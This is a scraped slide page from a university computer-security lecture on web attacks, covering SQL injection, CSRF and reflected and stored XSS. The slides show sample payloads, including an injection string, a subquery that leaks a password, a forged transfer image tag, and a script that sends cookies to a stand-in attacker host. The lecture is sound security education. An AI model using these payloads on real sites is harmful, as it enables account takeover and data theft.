web attacks con t
play

Web Attacks, cont CS 161: Computer Security Prof. Vern Paxson TAs: - PowerPoint PPT Presentation

Jul 04, 2023 •256 likes •777 views

Web Attacks, cont CS 161: Computer Security Prof. Vern Paxson TAs: Devdatta Akhawe, Mobin Javed & Matthias Vallentin http://inst.eecs.berkeley.edu/~cs161/ February 24, 2011 Announcements Guest lecture a week from Thursday (March

  1. Web Attacks, con’t CS 161: Computer Security Prof. Vern Paxson TAs: Devdatta Akhawe, Mobin Javed & Matthias Vallentin http://inst.eecs.berkeley.edu/~cs161/ February 24, 2011

  2. Announcements • Guest lecture a week from Thursday (March 3rd), Prof. David Wagner – Correction: material will not be in scope for the Midterm • My office hours the week of March 7th will be by appointment • Homework #2 should be out by tonight, due in 1 week

  3. Goals For Today • Make previously discussed web attacks concrete – SQL injection – Cross-site request forgery (CSRF) – Reflected cross-site scripting (XSS) • Illustrate additional web attacks – Stored XSS – Clickjacking • … and discuss defenses

  4. SQL Injection Scenario • Suppose web server front end stores URL parameter “ recipient ” in variable $recipient and then builds up a string with the following SQL query: $sql = "SELECT PersonID FROM Person WHERE Balance < 100 AND Username='$recipient' "; • How can recipient cause trouble here? – How can we see anyone’s account?

  5. SQL Injection Scenario, con’t WHERE Balance < 100 AND Username='$recipient'; " • $recipient = foo ' OR 1=1; -- WHERE Balance < 100 AND Username='foo' OR 1=1; --' " • Precedence & “--” (comment) makes this: WHERE (Balance < 100 AND Username='foo') OR 1=1; • Always true!

  6. Demo Tools • Bro : freeware network monitoring tool – Scriptable – Primarily designed for real-time intrusion detection – www.bro-­‑ids.org • Squigler – Cool “ localhost ” web site(s) (Python/SQLite) – Developed by Arel Cordero – Let me know if you’d like a copy to play with

  7. def ¡post_squig(user, ¡squig): ¡ ¡ ¡ ¡if ¡not ¡user ¡or ¡not ¡squig: ¡return ¡ ¡ ¡ ¡conn ¡= ¡sqlite3.connect(DBFN) ¡ ¡ ¡ ¡c ¡ ¡ ¡ ¡= ¡conn.cursor() ¡ ¡ ¡ ¡c.executescript("INSERT ¡INTO ¡squigs ¡VALUES ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡('%s', ¡'%s', ¡datetime('now'));" ¡% ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡ ¡(user, ¡squig)) ¡ ¡ ¡ ¡conn.commit() Server code for posting a “squig” ¡ ¡ ¡ ¡c.close() INSERT ¡INTO ¡squigs ¡VALUES (dilbert, ¡'don't ¡contractions ¡work?', ¡ ¡ ¡ ¡ ¡ ¡date); Syntax error

  8. INSERT ¡INTO ¡squigs ¡VALUES (dilbert, ¡ ' ' || (select password from accounts where username='bob') || ' ' , ¡ ¡ ¡ ¡ ¡ ¡date);

  9. INSERT ¡INTO ¡squigs ¡VALUES (dilbert, ¡ ' ' || (select password from accounts where username='bob') || ' ' , Empty string literals ¡ ¡ ¡ ¡ ¡ ¡date);

  10. INSERT ¡INTO ¡squigs ¡VALUES (dilbert, ¡ ' ' || (select password from accounts where username='bob') || ' ' , Concatenation operator. ¡ ¡ ¡ ¡ ¡ ¡date); Concatenation of string S with empty string is just S INSERT ¡INTO ¡squigs ¡VALUES (dilbert, ¡ (select password from accounts where username='bob') , ¡ ¡ ¡ ¡ ¡ ¡date); Value of the squig will be Bob’s password!

  11. Web Accesses w/ Side Effects • Recall our earlier banking URL: http://mybank.com/moneyxfer.cgi?account=alice&amt=50&to=bob • So what happens if we visit evilsite.com , which includes: <img ¡src="http://mybank.com/moneyxfer.cgi? ¡ ¡ ¡Account=alice&amt=500000&to=DrEvil"> • Cross-Site Request Forgery ( CSRF ) attack

  12. URL fetch for posting a squig Request ¡(to ¡127.0.0.1/8080): ¡GET ¡ ¡ ¡ ¡/do_squig?redirect=%2Fuserpage%3Fuser%3Ddilbert ¡ ¡ ¡ ¡&squig=squigs+speak+a+deep+truth HOST: ¡"localhost:8080" REFERER:"http://localhost:8080/userpage?user=dilbert" COOKIE: ¡"session_id=5321506" Web action with side effect

  13. URL fetch for posting a squig Request ¡(to ¡127.0.0.1/8080): ¡GET ¡ ¡ ¡ ¡/do_squig?redirect=%2Fuserpage%3Fuser%3Ddilbert ¡ ¡ ¡ ¡&squig=squigs+speak+a+deep+truth HOST: ¡"localhost:8080" REFERER:"http://localhost:8080/userpage?user=dilbert" COOKIE: ¡"session_id=5321506" Authenticated with cookie that browser automatically sends along

  14. Subversive Script Execution

  15. Cross-Site Scripting ( XSS ) • Attacker’s goal: cause victim’s browser to execute Javascript written by the attacker … • … but with the browser believing that the script instead was sent by a trust server mybank.com – In order to circumvent the Same Origin Policy (SOP), which will prevent the browser from letting Javascript received directly from evil.com to have full access to content from mybank.com • (Do not confuse with CSRF! CSRF is about web requests with side effects; XSS is about getting Javascript treated as though a trusted server sent it)

  16. The Setup • User input is echoed into HTML response. • Example : search field – http://victim.com/search.php?term= apple – search.php responds with: <HTML> <TITLE> Search Results </TITLE> <BODY> Results for <?php echo $_GET[term] ?> : . . . </BODY> </HTML> • How can an attacker exploit this? 16

  17. Injection Via Bad Input • Consider link: (properly URL encoded) http://victim.com/search.php?term= <script> window.open( "http://badguy.com?cookie = " + document.cookie ) </script> What if user clicks on this link? 1) Browser goes to victim.com/search.php 2) victim.com returns <HTML> Results for <script> … </script> … 3) Browser executes script in same origin as victim.com Sends badguy.com cookie for victim.com Or any other arbitrary execution / rewrite victim.com page 17

  18. Demo on (1) Finding and (2) Exploiting Reflected XSS vulnerabilities

  19. Cross-Site Scripting (XSS) Victim client

  20. Cross-Site Scripting (XSS) Attack Server visit web site 1 Victim client

  21. Cross-Site Scripting (XSS) Attack Server visit web site 1 receive malicious page 2 Victim client

  22. Cross-Site Scripting (XSS) Attack Server visit web site 1 receive malicious page 2 Exact URL under attacker’s control 3 click on link Victim client Server Patsy/Victim

  23. Cross-Site Scripting (XSS) Attack Server visit web site 1 receive malicious page 2 3 click on link Victim client 4 echo user input Server Patsy/Victim

  24. Cross-Site Scripting (XSS) Attack Server visit web site 1 receive malicious page 2 3 click on link Victim client 4 echo user input 5 Server Patsy/Victim execute script embedded in input as though server meant us to run it

  25. Cross-Site Scripting (XSS) Attack Server visit web site 1 receive malicious page 2 3 click on link Victim client 4 echo user input 6 5 Server Patsy/Victim perform attacker action execute script embedded in input as though server meant us to run it

  26. Cross-Site Scripting (XSS) Attack Server visit web site And/Or: 1 receive malicious page send valuable data 2 7 3 click on link Victim client 4 echo user input 5 Server Patsy/Victim execute script embedded in input as though server meant us to run it

  27. Cross-Site Scripting (XSS) Attack Server visit web site 1 receive malicious page send valuable data 2 7 (“Reflected” XSS attacks) 3 click on link Victim client 4 echo user input 6 5 Server Patsy/Victim perform attacker action execute script embedded in input as though server meant us to run it

  29. Stored Cross-Site Scripting Attack Server

  30. Stored Cross-Site Scripting Attack Server 1 Inject malicious script Server Patsy/Victim

  31. Stored Cross-Site Scripting Attack Server 1 Inject malicious User Victim script Server Patsy/Victim

  32. Stored Cross-Site Scripting Attack Server 1 Inject malicious 2 request content User Victim script Server Patsy/Victim

  33. Stored Cross-Site Scripting Attack Server 1 Inject malicious 2 request content User Victim script 3 receive malicious script Server Patsy/Victim

  34. Stored Cross-Site Scripting Attack Server 1 Inject malicious 2 request content User Victim script 3 receive malicious script Server Patsy/Victim 4 execute script embedded in input as though server meant us to run it

  35. Stored Cross-Site Scripting Attack Server 1 Inject malicious 2 request content User Victim script 3 receive malicious script Server Patsy/Victim 5 4 perform attacker action execute script embedded in input as though server meant us to run it

  36. Stored Cross-Site Scripting Attack Server And/Or: steal valuable data 6 1 Inject malicious 2 request content User Victim script 3 receive malicious script Server Patsy/Victim 5 4 perform attacker action execute script embedded in input as though server meant us to run it

  37. Stored Cross-Site Scripting Attack Server steal valuable data 6 1 Inject malicious 2 request content User Victim script 3 receive malicious script Server Patsy/Victim 5 4 perform attacker action execute script (A “stored” embedded in input XSS attack) as though server meant us to run it

Recommend

NETWORKING ATTACKS NETWORKING ATTACKS NOTICES Lab #2 extended to Feb. 17 @ 23:59 HW #3

NETWORKING ATTACKS NETWORKING ATTACKS NOTICES Lab #2 extended to Feb. 17 @ 23:59 HW #3

CMPS122: COMPUTER SECURITY NETWORKING ATTACKS NETWORKING ATTACKS NOTICES Lab #2 extended to Feb. 17 @ 23:59 HW #3 due tonight NETWORKING ATTACKS LAST TIME TCP/IP networking stack Physical layer Data link layer Network

1.1k views • 61 slides
Generic Attacks on Stream Ciphers John Mattsson Generic Attacks on Stream Ciphers 2/22

Generic Attacks on Stream Ciphers John Mattsson Generic Attacks on Stream Ciphers 2/22

Generic Attacks on Stream Ciphers John Mattsson Generic Attacks on Stream Ciphers 2/22 Overview What is a stream cipher? Classification of attacks Different Attacks Exhaustive Key Search Time Memory Tradeoffs

656 views • 22 slides
Wireless Security Wireless Network Attacks Access control attacks These attacks attempt to

Wireless Security Wireless Network Attacks Access control attacks These attacks attempt to

Wireless Security Wireless Network Attacks Access control attacks These attacks attempt to penetrate a network by using wireless or evading WLAN access control measures, like AP MAC filters and 802.1X port access controls. Type of Attack

184 views • 7 slides
Backbone Infrastructure Attacks and Protections draft-savola-rtgwg-backbone-attacks-01.txt Pekka

Backbone Infrastructure Attacks and Protections draft-savola-rtgwg-backbone-attacks-01.txt Pekka

Backbone Infrastructure Attacks and Protections draft-savola-rtgwg-backbone-attacks-01.txt Pekka Savola Introduction Describes a view of ISP backbone network attacks Lots of folks in IETF and elsewhere had quite different ideas whats out

529 views • 9 slides
CROSS SITE SCRIPTING (XSS) ATTACKS Injection attacks 3/18/19 1 Whoami Ad Adam Nu Nurudin

CROSS SITE SCRIPTING (XSS) ATTACKS Injection attacks 3/18/19 1 Whoami Ad Adam Nu Nurudin

CROSS SITE SCRIPTING (XSS) ATTACKS Injection attacks 3/18/19 1 Whoami Ad Adam Nu Nurudin ini CEH, ITIL L V3, 3, CCNA, CCNP, CASP, PCI-DS DSS.. .. Lead Security Researcher @ Netwatch Technologies Project Consultant, Information

377 views • 20 slides
Dealing with cache based attacks in cryptography Speculating on cache attacks Simo Sorce Sr.

Dealing with cache based attacks in cryptography Speculating on cache attacks Simo Sorce Sr.

Dealing with cache based attacks in cryptography Speculating on cache attacks Simo Sorce Sr. Principal Software Engineer 2019/02/19 What are cache based attacks ? In cryptography In cryptographic operations, leaking the internal state of a

338 views • 8 slides
Spotting and Stopping Business Email Compromise Attacks How spear phishing and BEC attacks

Spotting and Stopping Business Email Compromise Attacks How spear phishing and BEC attacks

Spotting and Stopping Business Email Compromise Attacks How spear phishing and BEC attacks require a full- lifecycle approach to email security Paul Roberts, Editor in Chief Speakers Kevin OBrien, CEO 2:00 - 2:05 Introductions,

483 views • 23 slides
CS 110 Summer 2018 Ryan Eberhardt DDoS Attacks

CS 110 Summer 2018 Ryan Eberhardt DDoS Attacks

CS 110 Summer 2018 Ryan Eberhardt DDoS Attacks https://www.reveelium.com/en/ddos-attacks-the-cyber-boogeyman-part-i/ DDoS Attacks 1,700 Gbps!! 2015 :-/

748 views • 20 slides
Resilient Networking 6: Attacks on DNS 1 Chapter Outline Overview of DNS Known attacks

Resilient Networking 6: Attacks on DNS 1 Chapter Outline Overview of DNS Known attacks

Resilient Networking 6: Attacks on DNS 1 Chapter Outline Overview of DNS Known attacks on DNS Denial-of-Service Cache Poisoning Securing DNS Split-Split-DNS DNSSEC 2 DNS The Domain Name System Naming Service

1.15k views • 46 slides
MitM attacks on sessions t attac s o sess o s sws2 1 MitM (Man-in-the-Middle)attacks ( )

MitM attacks on sessions t attac s o sess o s sws2 1 MitM (Man-in-the-Middle)attacks ( )

Software and Web Security 2 MitM attacks on sessions t attac s o sess o s sws2 1 MitM (Man-in-the-Middle)attacks ( ) MitM attack: attacker gets between the browser and the web server, eg eg by setting up a wifi access point

345 views • 9 slides
History of Format String Attacks Format String Attacks

History of Format String Attacks Format String Attacks

History of Format String Attacks Format String Attacks First noted in 1990 as a result of fuzz testing on csh First used as an attack

488 views • 28 slides
pq Outline Description of the FSB Hash Function Classic Attacks Recent Attacks

pq Outline Description of the FSB Hash Function Classic Attacks Recent Attacks

Syndrome Based Collision Resistant Hashing Matthieu Finiasz pq Outline Description of the FSB Hash Function Classic Attacks Recent Attacks Proposed Improvements and Parameters pq 1 Description of the FSB Hash Function pq

286 views • 28 slides
HOST Differential Power Attacks ECE 525 Side-Channel Attacks Cryptographic algorithms assume

HOST Differential Power Attacks ECE 525 Side-Channel Attacks Cryptographic algorithms assume

HOST Differential Power Attacks ECE 525 Side-Channel Attacks Cryptographic algorithms assume that secret keys are utilized by implementations of the algorithm in a secure fashion, with access only allowed through the I/Os Unfortunately,

363 views • 12 slides
A LERTING Daniel Romo Niels van Dijkhuizen BACKGROUND DDoS attacks are commonly seen in

A LERTING Daniel Romo Niels van Dijkhuizen BACKGROUND DDoS attacks are commonly seen in

DD O S D ETECTION AND A LERTING Daniel Romo Niels van Dijkhuizen BACKGROUND DDoS attacks are commonly seen in the SURFnet network Mostly flooding attacks Customers are heavily affected and complain These attacks are cheap and

767 views • 17 slides
Protection of flows Protection of flows under targeted attacks under targeted attacks Jannik

Protection of flows Protection of flows under targeted attacks under targeted attacks Jannik

Protection of flows Protection of flows under targeted attacks under targeted attacks Jannik Matuschke Tom McCormick Gianpaolo Oriolo TU Berlin UBC Vancouver Tor Vergata Britta Peis Martin Skutella RWTH Aachen TU Berlin Robust flows

531 views • 28 slides
Denial of Service Attacks Summary ITS335: IT Security Sirindhorn International Institute of

Denial of Service Attacks Summary ITS335: IT Security Sirindhorn International Institute of

ITS335 DoS Attacks DoS Attacks Classic DoS Flooding &amp; DDoS Denial of Service Attacks Summary ITS335: IT Security Sirindhorn International Institute of Technology Thammasat University Prepared by Steven Gordon on 13 August 2013

409 views • 26 slides
Threshold Implementations (Efficient TI on AES) Begl Bilgin, Benedikt Gierlichs, Svetla Nikova,

Threshold Implementations (Efficient TI on AES) Begl Bilgin, Benedikt Gierlichs, Svetla Nikova,

Threshold Implementations (Efficient TI on AES) Begl Bilgin, Benedikt Gierlichs, Svetla Nikova, Ventzislav Nikov, and Vincent Rijmen Introduction Physical Attacks Active Passive (Fault Attacks) (Observing Attacks) Side Channel Attacks

644 views • 45 slides
Generic Attacks against MAC algorithms G. Leurent (Inria) Generic Attacks against MAC algorithms

Generic Attacks against MAC algorithms G. Leurent (Inria) Generic Attacks against MAC algorithms

Introduction Hash-based MACs State recovery Universal forgery Key-recovery Conclusion Generic Attacks against MAC algorithms G. Leurent (Inria) Generic Attacks against MAC algorithms ASK 2015 1 / 59 Gatan Leurent Inria Rocquencourt,

1.71k views • 102 slides
Defense Mechanism against Spectre Attacks Jacob Fustos, Farzad Farshchi, Heechul Yun University

Defense Mechanism against Spectre Attacks Jacob Fustos, Farzad Farshchi, Heechul Yun University

SpectreGuard: An Efficient Data-centric Defense Mechanism against Spectre Attacks Jacob Fustos, Farzad Farshchi, Heechul Yun University of Kansas 1 Speculative Execution Attacks Attacks exploiting microarchitectural side-effects of

499 views • 21 slides
Cache attacks: From side channels to fault attacks Clmentine Maurice CNRS, Rennes, France

Cache attacks: From side channels to fault attacks Clmentine Maurice CNRS, Rennes, France

Cache attacks: From side channels to fault attacks Clmentine Maurice CNRS, Rennes, France November 16, 2017 Cryptacus Workshop, Nijmegen, Netherlands the attacker only needs unprivileged execution on the victims machine

1.99k views • 164 slides
Smart Card Attacks: Enter the Matrix Tiana Razafindralambo Guillaume Bouffard Julien

Smart Card Attacks: Enter the Matrix Tiana Razafindralambo Guillaume Bouffard Julien

Introduction Logical attacks Combined attacks Conclusion Smart Card Attacks: Enter the Matrix Tiana Razafindralambo Guillaume Bouffard Julien Iguchi-Cartigny Jean-Louis Lanet Smart Secure Devices (SSD) Team Xlim Labs Universit e

902 views • 53 slides
Encryption and Attacks Attacks on Encryption Block Cipher Design Principles Cryptography

Encryption and Attacks Attacks on Encryption Block Cipher Design Principles Cryptography

Cryptography Encryption and Attacks Encryption Building Blocks Encryption and Attacks Attacks on Encryption Block Cipher Design Principles Cryptography Stream Cipher Design Principles Example: Brute School of Engineering and Technology

681 views • 51 slides
Encryption and Attacks Attacks on Encryption Block Cipher Design Principles Cryptography

Encryption and Attacks Attacks on Encryption Block Cipher Design Principles Cryptography

Cryptography Encryption and Attacks Encryption Building Blocks Encryption and Attacks Attacks on Encryption Block Cipher Design Principles Cryptography Stream Cipher Design Principles Example: Brute School of Engineering and Technology

923 views • 51 slides
MOBILE DATA CHARGING: NEW ATTACKS NEW ATTACKS AND COUNTERMEASURES AND COUNTERMEASURES Chunyi

MOBILE DATA CHARGING: NEW ATTACKS NEW ATTACKS AND COUNTERMEASURES AND COUNTERMEASURES Chunyi

MOBILE DATA CHARGING: NEW ATTACKS NEW ATTACKS AND COUNTERMEASURES AND COUNTERMEASURES Chunyi Peng Chunyi Peng , Chi-Yu Li, Guan-Hua Tu, Songwu Lu, Lixia Zhang University of California, Los Angeles ACM CCS12 ACM CCS'12 C Peng (UCLA)

480 views • 27 slides

More recommend